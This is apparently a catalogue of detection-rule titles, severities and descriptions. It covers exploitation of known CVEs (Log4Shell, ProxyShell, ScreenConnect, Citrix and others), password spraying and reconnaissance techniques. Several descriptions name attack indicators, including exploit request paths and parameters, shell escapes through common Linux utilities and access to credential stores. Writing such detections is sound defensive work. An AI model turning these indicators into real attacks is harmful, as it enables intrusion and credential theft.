Potential CVE-2021-26084 Exploitation AttempthighDetects potential exploitation of CVE-2021-260841 a Confluence RCE using OGNL injection
Exploitation of CVE-2021-26814 in WazuhhighDetects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814
ProxyLogon Reset Virtual Directories Based On IIS LogcriticalWhen exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories
Potential CVE-2021-27905 Exploitation AttemptmediumDetects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1.
Exchange Exploitation CVE-2021-28480criticalDetects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480
CVE-2021-33766 Exchange ProxyToken ExploitationcriticalDetects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766
ADSelfService ExploitationhighDetects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539
CVE-2021-40539 Zoho ManageEngine ADSelfService Plus ExploitcriticalDetects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).
LPE InstallerFileTakeOver PoC CVE-2021-41379highDetects PoC tool used to exploit LPE vulnerability CVE-2021-41379
CVE-2021-41773 Exploitation AttempthighDetects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
Sitecore Pre-Auth RCE CVE-2021-42237highDetects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx
Grafana Path Traversal Exploitation CVE-2021-43798criticalDetects a successful Grafana path traversal exploitation
Potential CVE-2021-44228 Exploitation Attempt - VMware HorizonhighDetects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j.
Log4j RCE CVE-2021-44228 GenerichighDetects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)
Log4j RCE CVE-2021-44228 in FieldshighDetects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
Exchange ProxyShell PatternhighDetects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)
Successful Exchange ProxyShell AttackcriticalDetects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers
SonicWall SSL/VPN Jarrewrite ExploitationhighDetects exploitation attempts of the SonicWall Jarrewrite Exploit
Exchange Exploitation Used by HAFNIUMhighDetects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity
Potential CVE-2022-21587 Exploitation AttempthighDetects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution.
Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code ExecutionmediumDetects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
Potential CVE-2022-26809 Exploitation AttempthighDetects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
Zimbra Collaboration Suite Email Server Unauthenticated RCEmediumDetects an attempt to leverage the vulnerable servlet "mboximport" for an unauthenticated remote command injection
CVE-2022-31659 VMware Workspace ONE Access RCEmediumDetects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659
CVE-2022-31656 VMware Workspace ONE Access Auth BypasshighDetects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656 VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
Apache Spark Shell Command Injection - WeblogshighDetects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective
Atlassian Bitbucket Command Injection Via Archive APIhighDetects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804
Potential OWASSRF Exploitation Attempt - ProxyhighDetects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint
OWASSRF Exploitation Attempt Using Public POC - ProxycriticalDetects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
Potential OWASSRF Exploitation Attempt - WebserverhighDetects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint
OWASSRF Exploitation Attempt Using Public POC - WebservercriticalDetects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
Exploitation Indicator Of CVE-2022-42475highDetects exploitation indicators of CVE-2022-42475 a heap-based buffer overflow in sslvpnd.
Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877highDetects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877
Potential CVE-2022-46169 Exploitation AttempthighDetects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169
CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21mediumDetects potential exploitation attempt of CVE-2023-1389 an Unauthenticated Command Injection in TP-Link Archer AX21.
Exploitation Indicators Of CVE-2023-20198highDetecting exploitation indicators of CVE-2023-20198 a privilege escalation vulnerability in Cisco IOS XE Software Web UI.
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)highDetects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)mediumDetects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy)mediumDetects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver)mediumDetects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
Potential CVE-2023-2283 ExploitationmediumDetects potential exploitation attempt of CVE-2023-2283 an authentication bypass in libSSH. The exploitation method causes an error message stating that keys for curve25519 could not be generated. It is an error message that is a sign of an exploitation attempt. It is not a sign of a successful exploitation.
CVE-2023-23397 Exploitation AttemptcriticalDetects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.
Potential CVE-2023-23752 Exploitation AttempthighDetects the potential exploitation attempt of CVE-2023-23752 an Improper access check, in web service endpoints in Joomla
Potential CVE-2023-25157 Exploitation AttempthighDetects a potential exploitation attempt of CVE-2023-25157 a SQL injection in GeoServer
Potential CVE-2023-25717 Exploitation AttempthighDetects a potential exploitation attempt of CVE-2023-25717 a Remote Code Execution via an unauthenticated HTTP GET Request, in Ruckus Wireless Admin
Potential CVE-2023-27997 Exploitation IndicatorsmediumDetects indicators of potential exploitation of CVE-2023-27997 in Frotigate weblogs. To avoid false positives it is best to look for successive requests to the endpoints mentioned as well as weird values of the "enc" parameter
Potential MOVEit Transfer CVE-2023-34362 Exploitation - File ActivityhighDetects file indicators of potential exploitation of MOVEit CVE-2023-34362.
Potential Information Disclosure CVE-2023-43261 Exploitation - ProxyhighDetects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in proxy logs.
Potential Information Disclosure CVE-2023-43261 Exploitation - WebhighDetects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in access logs.
CVE-2023-46747 Exploitation Activity - ProxyhighDetects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.
CVE-2023-46747 Exploitation Activity - WebserverhighDetects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.
CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - ProxyhighDetects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs by looking for a very long host header string.
CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - ProxymediumDetects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs.
CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - WebservermediumDetects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs.
CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - WebserverhighDetects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs by looking for a very long host header string.
Potential Exploitation Attempt Of Undocumented WindowsServer RCEhighDetects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)
CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command InjectionhighDetects potential exploitation of CVE-2024-1709 an unauthenticated command injection in Progress Kemp LoadMaster. It looks for GET requests to '/access/set' API with the parameters 'param=enableapi' and 'value=1' as well as an "Authorization" header with a base64 encoded value with an uncommon character.
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - SecuritycriticalThis detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.
CVE-2024-1709 - ScreenConnect Authentication Bypass ExploitationcriticalDetects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709.
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command InjectionhighDetects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.
.Class Extension URI Ending RequestmediumDetects requests to URI ending with the ".class" extension in proxy logs. This could rules can be used to hunt for potential downloads of Java classes as seen for example in Log4shell exploitation attacks against Log4j.
WebDAV Temporary Local File CreationmediumDetects the creation of WebDAV temporary files with potentially suspicious extensions
OMIGOD SCX RunAsProvider ExecuteScripthighRule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
Multiple Suspicious Resp Codes Caused by Single ClientmediumDetects possible exploitation activity or bugs in a web application
Possible DNS RebindingmediumDetects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL).
Password Spraying via Explicit CredentialsmediumDetects a single user failing to authenticate to multiple users using explicit credentials.
Multiple Users Failing to Authenticate from Single ProcessmediumDetects failed logins with multiple accounts from a single process on the system.
Valid Users Failing to Authenticate From Single Source Using KerberosmediumDetects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.
Disabled Users Failing To Authenticate From Source Using KerberosmediumDetects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.
Invalid Users Failing To Authenticate From Source Using KerberosmediumDetects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.
Valid Users Failing to Authenticate from Single Source Using NTLMmediumDetects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.
Invalid Users Failing To Authenticate From Single Source Using NTLMmediumDetects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.
Multiple Users Remotely Failing To Authenticate From Single SourcemediumDetects a source system failing to authenticate against a remote host with multiple users.
attack.discovery | 245
Title | Level | Description
AzureHound PowerShell Commands | high | Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound.
Powershell File and Directory Discovery | low | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
CrackMapExecWin | critical | Detects CrackMapExecWin activity as described by NCSC.
Trickbot Malware Reconnaissance Activity | high | Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.
Run Whoami as SYSTEM | high | Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.
Domain Trust Discovery | medium | Detects a discovery of domain trusts.
Correct Execution of Nltest.exe | high | The attacker might use the LOLBAS nltest.exe for discovery of domain controllers, domain trusts, the parent domain and the current user's permissions.
OpenCanary - SNMP OID Request | high | Detects instances where an SNMP service on an OpenCanary node has received an OID request.
Remote Schedule Task Recon via AtScv | high | Detects remote RPC calls to read information about scheduled tasks via AtScv.
Possible DCSync Attack | high | Detects remote RPC calls to MS-DRSR from non-DC hosts, which could indicate DCSync / DCShadow attacks.
Remote Event Log Recon | high | Detects remote RPC calls to get event log information via EVEN or EVEN6.
Remote Schedule Task Recon via ITaskSchedulerService | high | Detects remote RPC calls to read information about scheduled tasks.
Remote Registry Recon | high | Detects remote RPC calls to collect information.
Recon Activity via SASec | high | Detects remote RPC calls to read information about scheduled tasks via SASec.
SharpHound Recon Account Discovery | high | Detects remote RPC calls used by SharpHound to map remote connections and local group membership.
Potential Bucket Enumeration on AWS | low | Looks for potential enumeration of AWS buckets via ListBuckets.
Discovery Using AzureHound | high | Detects AzureHound (a BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.
Bitbucket User Details Export Attempt Detected | medium | Detects user data export activity.
Google Cloud Storage Buckets Enumeration | low | Detects when a storage bucket is enumerated in Google Cloud.
Github Self Hosted Runner Changes Detected | low | A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runner configurations in the environment. Once a self-hosted runner configuration change is detected, it should be validated from the GitHub UI because the log entry may not provide full context.
Linux Network Service Scanning - Auditd | low | Detects enumeration of local or remote network services.
Network Sniffing - Linux | low | Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Password Policy Discovery - Linux | low | Detects password policy discovery commands.
System Information Discovery - Auditd | low | Detects system information discovery commands.
System and Hardware Information Discovery | informational | Detects system information discovery commands.
System Owner or User Discovery - LinuxlowDetects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Shell Invocation via Apt - LinuxmediumDetects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Capabilities Discovery - Linux | low | Detects usage of the "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or otherwise.
Crontab Enumeration | low | Detects usage of crontab to list the tasks of the user
ESXi Network Configuration Discovery Via ESXCLI | medium | Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
ESXi Storage Information Discovery Via ESXCLI | medium | Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.
ESXi System Information Discovery Via ESXCLI | medium | Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different components of the system, such as accounts, modules, NTP, etc.
ESXi VM List Discovery Via ESXCLI | medium | Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
ESXi VSAN Information Discovery Via ESXCLI | medium | Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
File and Directory Discovery - Linux | informational | Detects usage of system utilities such as "find", "tree", "findmnt", etc., to discover files, directories and network shares.
Shell Execution via Find - Linux | high | Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or an exploitation attempt.
Shell Execution via Flock - Linux | high | Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or breaking out from restricted environments.
Shell Execution GCC - Linux | high | Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or breaking out from restricted environments.
OS Architecture Discovery Via Grep | low | Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
Local System Accounts Discovery - Linux | low | Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Local Groups Discovery - Linux | low | Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
Potential GobRAT File Discovery Via Grep | high | Detects the use of grep to discover specific files created by the GobRAT malware
Shell Execution via Nice - Linux | high | Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or breaking out from restricted environments.
Pnscan Binary Data Transmission Activity | medium | Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
Linux Remote System Discovery | low | Detects the enumeration of other remote systems.
Security Software Discovery - Linux | low | Detects usage of system utilities (only grep and egrep for now) to perform security software discovery
Container Residence Discovery Via Proc Virtual FS | low | Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
Docker Container Discovery Via Dockerenv Listing | low | Detects listing or file reading of ".dockerenv", which can be a sign of potential container discovery
Potential Discovery Activity Using Find - Linux | medium | Detects usage of the "find" binary in a suspicious manner to perform discovery
Potential Container Discovery Via Inodes Listing | low | Detects listing of the inodes of the "/" directory to determine if we are running inside of a container.
Linux Network Service Scanning Tools Execution | low | Detects execution of network scanning and reconnaissance tools. These tools can be used for the enumeration of local or remote network services, for example.
System Information Discovery | informational | Detects system information discovery commands
System Network Connections Discovery - Linux | low | Detects usage of system utilities to discover system network connections
System Network Discovery - Linux | informational | Detects enumeration of local network configuration
Vim GTFOBin Abuse - Linux | high | Detects the use of "vim" and its sibling commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or breaking out from restricted environments.
System Integrity Protection (SIP) Disabled | medium | Detects the use of csrutil to disable System Integrity Protection (SIP). This technique is used in post-exploit scenarios.
System Integrity Protection (SIP) Enumeration | low | Detects the use of csrutil to view the System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.
File and Directory Discovery - MacOS | informational | Detects usage of system utilities to discover files and directories
System Information Discovery Using Ioreg | medium | Detects the use of "ioreg", which shows I/O Kit registry information. This process is used for system information discovery. It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.
Local System Accounts Discovery - MacOs | low | Detects enumeration of local system accounts on MacOS
Local Groups Discovery - MacOs | informational | Detects enumeration of local system groups
MacOS Network Service Scanning | low | Detects enumeration of local or remote network services.
Network Sniffing - MacOs | informational | Detects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Macos Remote System Discovery | informational | Detects the enumeration of other remote systems.
Security Software Discovery - MacOs | medium | Detects usage of system utilities (only grep for now) to perform security software discovery
Potential Discovery Activity Using Find - MacOS | medium | Detects usage of the "find" binary in a suspicious manner to perform discovery
System Network Discovery - macOS | informational | Detects enumeration of local network configuration
System Information Discovery Using sw_vers | medium | Detects the use of "sw_vers" for system information discovery
System Information Discovery Via Sysctl - MacOS | medium | Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. This process is primarily used to detect and avoid virtualization and analysis environments.
System Information Discovery Using System_Profiler | medium | Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
System Network Connections Discovery - MacOs | informational | Detects usage of system utilities to discover system network connections
Cisco Collect Data | low | Collect pertinent data from the configuration files
Cisco Discovery | low | Find information about network devices that is not stored in config files
Cisco Sniffing | medium | Show when a monitor or a span/rspan is set up or modified
PUA - Advanced IP/Port Scanner Update Check | medium | Detects the update check performed by Advanced IP/Port Scanner utilities.
Source Code Enumeration Detection by Keyword | medium | Detects source code enumeration that uses GET requests with keyword searches in URL strings
Potential Active Directory Reconnaissance/Enumeration Via LDAP | medium | Detects potential Active Directory enumeration via LDAP
Azure AD Health Monitoring Agent Registry Keys Access | medium | This detection uses Windows security events to detect suspicious access attempts to the registry key of the Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.
Azure AD Health Service Agents Registry Keys Access | medium | This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g. AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys.
AD Privileged Users or Groups Reconnaissance | high | Detects privileged users or groups recon based on event ID 4661 and known privileged users or groups SIDs
Potential AD User Enumeration From Non-Machine Account | medium | Detects read access to a domain user from a non-machine account
Hacktool Ruler | high | Detects events that are generated when using the hacktool Ruler by Sensepost
Password Policy Enumerated | medium | Detects when the password policy is enumerated.
Windows Pcap Drivers | medium | Detects Windows Pcap driver installation based on a list of associated .sys files.
SAM Registry Hive Handle Request | high | Detects handles requested to the SAM registry hive
SCM Database Handle Failure | medium | Detects non-system users failing to get a handle of the SCM database.
Reconnaissance Activity | high | Detects activity such as "net user administrator /domain" and "net group domain admins /domain"
SysKey Registry Keys Access | high | Detects handle requests and access operations to specific registry keys to calculate the SysKey
DNS Server Discovery Via LDAP Query | low | Detects DNS server discovery via LDAP query requests from uncommon applications
Advanced IP Scanner - File Event | medium | Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
BloodHound Collection Files | high | Detects default file names output by the BloodHound collection tool SharpHound
GatherNetworkInfo.VBS Reconnaissance Script Output | medium | Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".
Uncommon Connection to Active Directory Web Services | medium | Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
Suspicious Network Connection to IP Lookup Service APIs | medium | Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post-compromise internet test activity.
Python Initiated Connection | medium | Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.
Use Get-NetTCPConnection | low | Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Potential Active Directory Enumeration Using AD Module - PsModule | medium | Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL, which is often used by attackers to perform AD enumeration.
Malicious PowerShell Commandlets - PoshModule | high | Detects Commandlet names from well-known PowerShell exploitation frameworks
AD Groups Or Users Enumeration Using PowerShell - PoshModule | low | Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Use Get-NetTCPConnection - PowerShell Module | low | Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Suspicious Get Local Groups Information | low | Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Suspicious Get Information for SMB Share - PowerShell Module | low | Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
AADInternals PowerShell Cmdlets Execution - PsScript | high | Detects AADInternals cmdlet execution. A tool for administering Azure AD and Office 365, which can be abused by threat actors to attack Azure AD or Office 365.
Potential Active Directory Enumeration Using AD Module - PsScript | medium | Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL, which is often used by attackers to perform AD enumeration.
PowerShell ADRecon Execution | high | Detects execution of ADRecon.ps1 for AD reconnaissance, which has been reported to be actively used by FIN7
Get-ADUser Enumeration Using UserAccountControl Flags | medium | Detects AS-REP roasting, an attack that is often overlooked. It is not very common, as you have to explicitly set accounts that do not require pre-authentication.
Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell | medium | Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
DirectorySearcher Powershell Exploitation | medium | Enumerates Active Directory to determine computers that are joined to the domain
Active Directory Computers Enumeration With Get-AdComputer | low | Detects usage of the "Get-AdComputer" cmdlet to enumerate computers or properties within Active Directory.
Active Directory Group Enumeration With Get-AdGroup | low | Detects usage of the "Get-AdGroup" cmdlet to enumerate groups within Active Directory
Automated Collection Bookmarks Using Get-ChildItem PowerShell | low | Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
Security Software Discovery Via Powershell Script | medium | Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus.
HackTool - WinPwn Execution - ScriptBlock | high | Detects scriptblock text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
PowerShell Hotfix Enumeration | medium | Detects calls to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes, often used in "enum" scripts by attackers
Malicious PowerShell Commandlets - ScriptBlock | high | Detects Commandlet names from well-known PowerShell exploitation frameworks
Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock | medium | Detects the execution of PowerShell scripts with calls to the "Start-NetEventSession" cmdlet, which allows an attacker to start event and packet capture for a network event session. Adversaries may attempt to capture network traffic to gather information over the course of an operation. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.
Powershell Sensitive File Discovery | medium | Detects adversaries enumerating sensitive files
Detected Windows Software Discovery - PowerShell | medium | Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
AD Groups Or Users Enumeration Using PowerShell - ScriptBlock | low | Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Powershell Directory Enumeration | medium | Detects a technique used by MAZE ransomware to enumerate directories using PowerShell
Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy | low | Detects PowerShell activity in which Get-AdDefaultDomainPasswordPolicy is used to get the default password policy for an Active Directory domain.
Suspicious PowerShell Get Current User | low | Detects the use of PowerShell to identify the currently logged-on user.
Suspicious GPO Discovery With Get-GPO | low | Detects use of Get-GPO to get one GPO or all the GPOs in a domain.
Suspicious Process Discovery With Get-Process | low | Get the processes that are running on the local computer.
Suspicious Get Local Groups Information - PowerShell | low | Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Suspicious Get Information for SMB Share | low | Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Powershell Suspicious Win32_PnPEntity | low | Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.
User Discovery And Export Via Get-ADUser Cmdlet - PowerShell | medium | Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file
Console CodePage Lookup Via CHCP | medium | Detects use of chcp to look up the system locale value as part of host discovery
File And SubFolder Enumeration Via Dir Command | low | Detects usage of the "dir" command, part of Windows CMD, with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.
Active Directory Structure Export Via Csvde.EXE | medium | Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.
DirLister Execution | low | Detects the usage of "DirLister.exe", a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.
Potential Discovery Activity Via Dnscmd.EXE | medium | Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones are used to host the DNS records for a particular domain.
Potential Recon Activity Using DriverQuery.EXE | high | Detects usage of the "driverquery" utility to perform reconnaissance on installed drivers
DriverQuery.EXE Execution | medium | Detects usage of the "driverquery" utility, which can be used to perform reconnaissance on installed drivers
Domain Trust Discovery Via Dsquery | medium | Detects execution of "dsquery.exe" for domain trust discovery
